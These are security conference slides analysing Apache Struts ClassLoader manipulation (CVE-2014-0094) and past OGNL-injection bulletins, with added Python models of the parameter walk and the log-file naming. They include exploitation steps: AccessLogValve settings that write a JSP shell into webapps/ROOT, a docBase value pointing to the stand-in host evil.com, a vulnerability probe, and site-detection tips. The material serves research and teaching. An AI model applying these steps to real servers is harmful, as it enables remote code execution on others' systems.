Slides for the talk given at the RootedCON 2015 security conference by Julián Vilas (security analyst and researcher).
The goal of the talk was to give an overview of the security of the Apache Struts framework.
3. ¿Apache Struts?
Java framework
– for Java webapps
– Two major versions
  • Struts 1.x (EoL since 2013)
  • Struts 2.x

4. Why Struts?
• (Mar 2014) CVE-2014-0094 goes public
• What the hell was it?
  – Struts 2 vulnerability
  – Unauthenticated
  – All versions affected
  – Could lead to RCE

5. CVE-2014-0094
“ParametersInterceptor allows access to 'class' parameter which is directly mapped to getClass() method and allows ClassLoader manipulation”
• Credits:
  – Peter Magnusson
  – Przemysław Celej
• After reading it…
  – Let's learn some basics

6. OGNL
Object Graph Navigation Language
• Expression Language for getting and setting properties of Java objects
  – Objects that are stored in the Context
8. Struts 2 request processing
[Figure: request flow through a Struts 2 app, numbered 1 to 7. (1) The user requests http://struts.example.com/example/hello.action; (2) the Filter Dispatcher receives /example/hello.action; (3) the Interceptors run (ParametersInterceptor among them); (4) the Action executes; (5)(6) the Result is rendered; (7) the HTML goes back to the user.]

9. ParametersInterceptor
“This interceptor gets all parameters from ActionContext.getParameters() and sets them on the value stack by calling ValueStack.setValue(String, Object)”
“Because parameter names are effectively OGNL statements, it is important that security be taken into account”
http://struts.apache.org/release/2.0.x/struts2-core/apidocs/com/opensymphony/xwork2/interceptor/ParametersInterceptor.html
12. / 14. / 16. Available methods
Methods that can be reached
– As seen, OGNL allows us to reference getters and setters
[Figure, built up over three slides: the class hierarchy of the action and the methods reachable through it]
HelloWorldAction: execute(), getUsername(), setUsername()
  EXTENDS ActionSupport: … getErrors(), getTexts(), getFieldErrors(), getActionErrors(), getActionMessages(), getErrorMessages() …
    EXTENDS Object: … getClass() …

17. Navigating objects
• Parameters are evaluated iteratively as an AST chain, composed of
  – A chain of getters (without parameters)
  – Ending with a setter (1 String, boolean or int parameter)
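The evaluation rule on this slide (a chain of argument-less getters ending in a one-argument setter), as an added example that is not part of the talk nor of the Struts code base: a Python toy that mimics how ParametersInterceptor walks a parameter name such as class.classLoader.resources.cacheMaxSize over the hierarchy of the previous slides (getClass() inherited from Object, then the class loader), converts the String value to the type of the setter's single parameter, and how an excludeParams-style filter in the spirit of the S2-020 fix stops that walk. The classes, the cacheMaxSize setter (named after the property used for the vulnerability check later in the deck) and the EXCLUDE pattern are constructed for the example; they are neither Tomcat nor Struts code, and the pattern is not the regular expression Struts shipped.

```python
import inspect
import re


# Constructed stand-ins for the Java objects reachable from the action.
class Resources:
    def __init__(self):
        self.cacheMaxSize = 10240

    def setCacheMaxSize(self, value: int):   # setter with one int parameter
        self.cacheMaxSize = value


class ClassLoader:
    def __init__(self):
        self._resources = Resources()

    def getResources(self):
        return self._resources


class JavaClass:
    """Stands in for java.lang.Class, what Object.getClass() returns."""
    def __init__(self):
        self._loader = ClassLoader()

    def getClassLoader(self):
        return self._loader


class HelloWorldAction:
    """The action from the slides; getClass() is what it inherits from Object."""
    def __init__(self):
        self._username = ""
        self._class = JavaClass()

    def getUsername(self):
        return self._username

    def setUsername(self, value: str):
        self._username = value

    def getClass(self):
        return self._class


def _cap(name):
    return name[:1].upper() + name[1:]


def convert(raw, target):
    """OGNL-style conversion of the String value to the setter's parameter type."""
    if target is int:
        n = int(raw)                        # ValueError for "AAAAAAAAA"
        if not -2**31 <= n <= 2**31 - 1:    # a Java int is 32-bit on every platform
            raise ValueError(f"{raw} does not fit a Java int")
        return n
    if target is bool:
        return raw.lower() == "true"
    return raw


def set_parameter(root, name, raw):
    """Mimic ParametersInterceptor: 'a.b.c=v' becomes root.getA().getB().setC(v)."""
    parts = name.split(".")
    obj = root
    for part in parts[:-1]:                 # chain of getters without arguments
        getter = getattr(obj, "get" + _cap(part), None)
        if getter is None:
            raise AttributeError(f"no getter for '{part}'")
        obj = getter()
    setter = getattr(obj, "set" + _cap(parts[-1]), None)
    if setter is None:
        raise AttributeError(f"no setter for '{parts[-1]}'")
    (param,) = inspect.signature(setter).parameters.values()
    target = str if param.annotation is inspect.Parameter.empty else param.annotation
    setter(convert(raw, target))
    return obj


# Assumed approximation of the excludeParams idea behind the S2-020 fix:
# reject any name that navigates through 'class'. Not the exact Struts regex.
EXCLUDE = re.compile(r"(^|.*[.\[])[cC]lass([.\[]|$)")


def set_parameter_hardened(root, name, raw):
    if EXCLUDE.match(name):
        raise PermissionError(f"parameter '{name}' excluded")
    return set_parameter(root, name, raw)


def probe(root, name, raw, hardened=False):
    """Summarise the outcome of one parameter so results are easy to compare."""
    try:
        (set_parameter_hardened if hardened else set_parameter)(root, name, raw)
        return "set"
    except PermissionError:
        return "excluded"
    except ValueError:
        return "conversion-error"
    except AttributeError:
        return "unreachable"
```

Calling probe(HelloWorldAction(), "class.classLoader.resources.cacheMaxSize", "2147483647") returns "set" because every hop is a parameterless getter and the last hop is an int setter; the same name with "2147483648" or "AAAAAAAAA" returns "conversion-error", which is the distinction the vulnerability check later in the deck relies on; with hardened=True the walk is refused before any getter runs, while an ordinary action property such as username still works.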
18. Looking for setters
• Through object navigation, several setter methods that are not part of the Action can be reached
  – What methods?
• Post published by neobyte: http://sec.baidu.com/index.php?research/detail/id/18
  1. PoC for getting reachable setters
  2. A method for getting RCE on Tomcat 8

19. DEMO
Struts Tester on Tomcat 6 / 7 & Tomcat 8
Customized & commented version ready to use: https://github.com/julianvilas/rooted2k15

20. Exploitability
Tested against:
• Tomcat 6 / 7 → RCE via “docBase” (win only)
• Tomcat 8 → RCE via “AccessLogValve”
• Glassfish 4 → RCE via “docBase” (win only)
• Websphere 8.5 (developer) → RCE not found
• Weblogic 10 & 12 → RCE not found
• JBOSS 7.1 & 7.4 → RCE not found

21. What about Struts 1
• According to CVE-2014-0114, Struts 1 is also vulnerable
• Unpatched! (Struts 1 is past EoL, but is still in use)
• Different reason: Struts 1 has no OGNL nor Value Stack
  – The key: bean population with BeanUtils
• You can find some Alvaro Muñoz (@pwntester) gold, like further explanation and a filter to be applied as a workaround, at
  – http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.VBMB0i5_s0z
  – http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204#.VOsFG7CG_8Q
22. AccessLogValve exploitation
A log file named shell1.jsp is created at webapps/ROOT. When a nonexistent URL is requested, the request is logged into that file, which is interpreted as a JSP when it is accessed.
[Figure: screenshot of the request, with the four valve settings numbered 1 to 4. The getter chain in front of each property name is not shown.]
1. .directory=webapps/ROOT
2. .prefix=shell
3. .suffix=.jsp
4. .fileDateFormat=1
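The file-naming trick on this slide, as an added example that is not part of the talk nor of Tomcat: a Python model of how AccessLogValve composes its file name (prefix + date stamp + suffix, under directory) and of the “common” access-log line, showing why fileDateFormat=1 pins the name to shell1.jsp (in SimpleDateFormat a non-letter is copied literally, so the stamp is the constant “1”) and how the request line of a 404 lands verbatim in that file. The getter chain that reaches the valve is a hypothetical placeholder (VALVE), the client address, timestamp and the harmless `<%= 6*7 %>` scriptlet are constructed, and no real payload is reproduced.

```python
import datetime
import re

# Hypothetical placeholder for the getter chain that reaches the valve on the
# server; the real chain is not reproduced here.
VALVE = "path.to.accessLogValve"

# The four settings from the slide.
SLIDE_PARAMS = {
    "directory": "webapps/ROOT",
    "prefix": "shell",
    "suffix": ".jsp",
    "fileDateFormat": "1",
}

# Constructed timestamp used by demo().
DEFAULT_WHEN = datetime.datetime(2015, 3, 6, 12, 0, 0)


def request_parameters(valve_path=VALVE, params=SLIDE_PARAMS):
    """Full parameter names as they would be sent (each one an OGNL chain)."""
    return {f"{valve_path}.{key}": value for key, value in params.items()}


def simple_date_format(pattern, when):
    """Subset of java.text.SimpleDateFormat: y, M and d are pattern letters,
    every non-letter character is copied literally."""
    out = []
    for token in re.findall(r"y+|M+|d+|[a-zA-Z]+|[^a-zA-Z]+", pattern):
        if token[0] == "y":
            out.append(f"{when.year:04d}" if len(token) > 2 else f"{when.year % 100:02d}")
        elif token[0] == "M":
            out.append(f"{when.month:02d}")
        elif token[0] == "d":
            out.append(f"{when.day:02d}")
        elif token.isalpha():
            raise ValueError(f"pattern letter {token!r} not supported here")
        else:
            out.append(token)          # literal: this is what "1" hits
    return "".join(out)


def log_file_name(directory, prefix, suffix, file_date_format, when):
    """AccessLogValve writes <directory>/<prefix><dateStamp><suffix>."""
    stamp = simple_date_format(file_date_format, when) if file_date_format else ""
    return f"{directory}/{prefix}{stamp}{suffix}"


def common_log_line(client, request_line, status, size, when):
    """Tomcat 'common' pattern %h %l %u %t "%r" %s %b. %r is the request line
    copied verbatim, which is what carries attacker-chosen text into the file."""
    stamp = when.strftime("[%d/%b/%Y:%H:%M:%S +0000]")   # zone is constructed
    return f'{client} - - {stamp} "{request_line}" {status} {size}'


def demo(when=DEFAULT_WHEN):
    """Put the pieces together for a constructed request to a nonexistent URL."""
    p = SLIDE_PARAMS
    path = log_file_name(p["directory"], p["prefix"], p["suffix"],
                         p["fileDateFormat"], when)
    # Harmless scriptlet standing in for a payload: once the file sits under
    # webapps/ROOT with a .jsp suffix, a request for /shell1.jsp compiles it.
    line = common_log_line("203.0.113.5", "GET /<%= 6*7 %> HTTP/1.1", 404, 0, when)
    return path, line
```

With the default Tomcat settings (directory logs, prefix localhost_access_log., suffix .txt, fileDateFormat yyyy-MM-dd) the same function yields logs/localhost_access_log.2015-03-06.txt for a March 6th 2015 date; with the slide's four values it yields webapps/ROOT/shell1.jsp, and demo() returns that path together with a 404 line whose quoted request line still contains the scriptlet.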
24. docBase exploitation
• “The Document Base (also known as the Context Root) directory for this web application, or the pathname to the web application archive file (if this web application is being executed directly from the WAR file).”
• Legit application goes down
.docBase=//evil.com/shared

25. About metasploit module
• Tomcat 6/7 & GlassFish (docBase)
  – Only Win
  – Not landed yet in trunk but works fine
  – Matthew Hall (0x41414141) pull requests:
    https://github.com/rapid7/metasploit-framework/pull/3074
    https://github.com/rapid7/metasploit-framework/pull/3075
    https://github.com/rapid7/metasploit-framework/pull/3323
  – Same module as before, landed yesterday night

28. Searching Struts sites
• Dumb detection of Struts 2 sites
  – Default extension for Struts 2: “.action”
• Also, when configured by default, it accepts both “.action” and no extension

33. Vulnerability checking
• To check if a Struts 2 site is vulnerable, modify the “cacheMaxSize” property
  – Integer.MAX_VALUE == 2147483647 (a Java int is 32-bit on every platform)
• Tomcat 6/7 & Glassfish
• Tomcat 8
[Figure: screenshots of the check on each target with the values 2147483647, 2147483648 and AAAAAAAAA]

34. Vulnerability checking
• In Struts 1, if the conversion from String to Integer fails, a default value of 0 is set
• But when trying to set a method that receives an Object with a String, an exception is raised
36. Previous security bulletins
[Table: one row per Struts 2 security bulletin; only the description column survived extraction]
• RCE, when form validation fails, field values are interpreted as OGNL
• RCE, bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL
• RCE, bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL (! S2-003 fix was incomplete)
• RCE, user's input is evaluated as OGNL when there's a conversion error
• Several RCE: via ExceptionDelegator (same as S2-007), CookieInterceptor (same idea as S2-003 and S2-005), etc.
• RCE, incomplete fix for S2-003 and S2-005 on ParametersInterceptor

37. Previous security bulletins
• RCE, incomplete fix for S2-003, S2-005 and S2-009 on ParametersInterceptor when using values for redirections
• RCE, s:url and s:a tags, when "includeParams" is set, allow evaluating the values of request parameters as OGNL
• RCE, same as S2-013, incomplete fix
• RCE, actions using wildcards and Double OGNL evaluation allow OGNL injection
• RCE: DefaultActionMapper short-circuit navigation interpreted as OGNL
• RCE, what we saw in this presentation ☺ (ParametersInterceptor)
• RCE, incomplete fix for S2-020
• Incomplete fix for S2-020 and S2-021
39. Conclusions?
• Seven years between S2-001 and S2-020
• Same kind of vulnerabilities: injecting OGNL from user-supplied data
• Several bypasses for fixes
• Almost all RCE
• Take your own…

40. Bonus track - Confluence
• Is based on a WebWork fork (prior to Struts 2)
• If you look at their bulletins
  – Versions up to and including 5.5.1 are vulnerable to ClassLoader manipulation
    https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+2014-05-21
  – Versions up to 5.6 (before 5.6.6 and 5.5.7) are vulnerable to double OGNL evaluation
    https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2015-01-21
• Don't they look familiar? ☺